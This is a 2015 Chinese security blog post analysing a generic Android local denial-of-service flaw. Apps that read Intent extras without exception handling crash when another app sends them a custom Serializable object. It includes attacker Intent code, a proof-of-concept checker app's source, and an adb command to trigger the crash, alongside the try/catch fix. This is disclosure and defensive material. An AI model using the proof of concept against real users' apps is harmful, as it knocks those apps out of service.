Android APP通用型拒绝服务漏洞分析报告

移动安全 SP小编
2015-01-07 12,921

一、漏洞简述

Android APP通用型拒绝服务漏洞,当APP中使用了getXXXExtra的API时,由于应用开发者没有对传入的数据做异常判断,恶意应用可以通过传入畸形数据导致应用本地拒绝服务,目前该漏洞基本可通杀市面上绝大部分Android APP。

二、漏洞分析:

0xr0ot和Xbalien交流所有可能导致应用拒绝服务的异常类型时,发现了一处通用的本地拒绝服务漏洞
该通用型本地拒绝服务可以造成大面积的app拒绝服务
针对序列化对象而出现的拒绝服务主要是由于应用中使用了getSerializableExtra() 的API,由于应用开发者没有对传入的数据做异常判断,恶意应用可以通过传入畸形数据,导致应用本地拒绝服务。
漏洞应用代码片段:
Intent i = getIntent();
if(i.getAction().equals("serializable_action")){
i.getSerializableExtra("serializable_key");    //未做异常判断
}
攻击应用代码片段:
Intent i = new Intent();
i.setAction("serializable_action");
i.setClassName("com.exp.serializable", "com.exp.serializable.MainActivity"); 
i.putExtra("seriadddddlizable_dkey",XXX);    //此处是传入畸形数据
startActivity(i);
比如XXX处传入BigInteger.valueOf(1)极有可能发生转型异常错误java.lang.ClassCastException。

 

但后来交流中发现,当传入一个自定义的序列化对象Serializable或getParcelable对象时
,接收Intent的目标组件在getSerializableExtra()、getParcelable()等会抛出类未定义的异常java.lang.NoClassDefFoundError。
这是因为,当你给漏洞应用传入一个应用本身并没有的序列化类对象,在应用上下文中肯定是找不到这个类的。
自定义的序列化类很简单:
public class DataSchema implements Serializable {
private static final long serialVersionUID = -3601187837704976264L;
public DataSchema() {
        super();
}
}

 

对应的攻击代码中XXX处传入new DataSchema(),我们发现传入的key不管是否与漏洞应用相同,都会抛出类未定义的异常。
随着测试的深入,我们通过logcat发现,在错误日志里不一定是getSerializableExtra()、getParcelable()导致的。然后我们就延伸了下,试着向getXXXExtra()传入我们自定义的序列化类对象,发现都会抛出类未定义的异常。
测试app代码片段:
protected void onCreate(Bundle savedInstanceState) {
 
Intent intent = getIntent();
intent.getStringExtra("ROIS");    //此处依然会由于NoClassDefFoundError crash
}

 

接着我们测试了市面上大量主流应用,涵盖BAT等。发现这种方法可以通杀。我们开始觉得这个是android本身的问题,开始翻源代码。
/frameworks/base/core/java/android/content/Intent.java
 
    public String getStringExtra(String name) {
        return mExtras == null ? null : mExtras.getString(name);
    }
 
 
/frameworks/base/core/java/android/os/Bundle.java
 
    public String getString(String key) {
        unparcel(); //处理数据
        ...
    }
 
    /* package */ synchronized void unparcel() {
        ...
        mParcelledData.readMapInternal(mMap, N, mClassLoader);
...
    }
 
 
/frameworks/base/core/java/android/os/Parcel.java
 
readMapInternal解析传递进来的数据
/* package */ void readMapInternal(Map outVal, int N,
        ClassLoader loader) {
        while (N > 0) {
            Object key = readValue(loader);
            Object value = readValue(loader);
            outVal.put(key, value);
            N--;
        }
    }

 

最后当解析到Serializable对象时,由于加载不到类,抛出异常
public final Serializable readSerializable() {
...
        try {
            ObjectInputStream ois = new ObjectInputStream(bais);
            return (Serializable) ois.readObject();
        } catch (IOException ioe) {
            throw new RuntimeException("Parcelable encountered " +
                "IOException reading a Serializable object (name = " + name +
                ")", ioe);
        } catch (ClassNotFoundException cnfe) {
            throw new RuntimeException("Parcelable encountered" +
                "ClassNotFoundException reading a Serializable object (name = "
                + name + ")", cnfe);
        }
    }
但是回头想想,谷歌肯定不是认为这是android的漏洞,开发者只要加个try catch 捕获异常就可以了。
 Android-Google-App-Thumb

漏洞修复:

不管是get什么extra,只要是getXXXExtra(),加上try catch捕获异常即可。

漏洞检测:

为了方便大家测试我们写了个简单的验证程序CheckExtraCrash.apk。
http://yunpan.cn/cyxmpwnk3MMT3(提取码:7a7d)
主要代码:
 try
    {
      Bundle localBundle = getIntent().getExtras();
      if ((localBundle != null) && (localBundle.containsKey("class_name")) && (localBundle.containsKey("package_name")))
      {
        String str1 = localBundle.getString("class_name");
        String str2 = localBundle.getString("package_name");
        if ((!TextUtils.isEmpty(str2)) && (!TextUtils.isEmpty(str1)))
        {
          Intent localIntent = new Intent();
          localIntent.setComponent(new ComponentName(str2, str1));
          localIntent.putExtra("serializable_key", new DataSchema());
          startActivity(localIntent);
        }
      }
      finish();
      return;
    }
    catch (Exception localException)
    {
      while (true)
        localException.printStackTrace();
    }

 

使用方法:

adb shell am start -n com.qihoo.checkextracrash/.MainActivity -e package_name packagename -e class_name componentname

extras

参考:

http://androidxref.com/4.2.2_r1/xref/frameworks/base/core/java/android/os/Parcel.java

本文作者:SP小编

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/3859.html

Tags:
点赞: 0 评论:3 收藏: 0
新浪微博 QQ空间 微信扫一扫
评论  (3)
快来写下你的想法吧!
  • myhappyday 2015-02-26 9:04:07

    正常运行CheckExtraCrash.apk后,怎么查看运行效果?点击图标没有反应?

    回复
  • 清风 2020-03-12 15:47:24

    请问链接过期了,CheckExtraCrash.apk可以从哪里获取吗?非常感谢

    回复

SP小编
文章数:209 积分: 25

交流和分享以及愉快的玩耍

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号

活动日程

2022-06-17

Gdevops 全球敏捷运维峰会

2022-05-12

Mastering the Challenge!——来自The 3rd AutoCS 2022智能汽车信息安全大会的邀请函

2021-11-18

AutoSW 2021智能汽车软件开发大会

2021-06-27

2021中国国际网络安全博览会暨高峰论坛

2021-05-27

The 2nd AutoCS 2021智能汽车信息安全大会

2020-12-18

贝壳找房2020 ICS安全技术峰会

2020-12-11

全球敏捷运维峰会(Gdevops2020)

2020-12-04

2020京麒网络安全大会

2020-11-29

OPPO技术开放日第六期|聚焦应用与数据安全防护

2020-11-27

EISS-2020企业信息安全峰会之上海站 11.27

2020-09-24

CSDI summit中国软件研发管理行业技术峰会

2020-09-23

2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会

2020-07-31

EISS-2020企业信息安全峰会之北京站 | 7.31(周五线上)

2020-04-15

看雪.安恒 2020 KCTF 春季赛

2020-01-09

相约本地生活安全沙龙暨白帽子颁奖典礼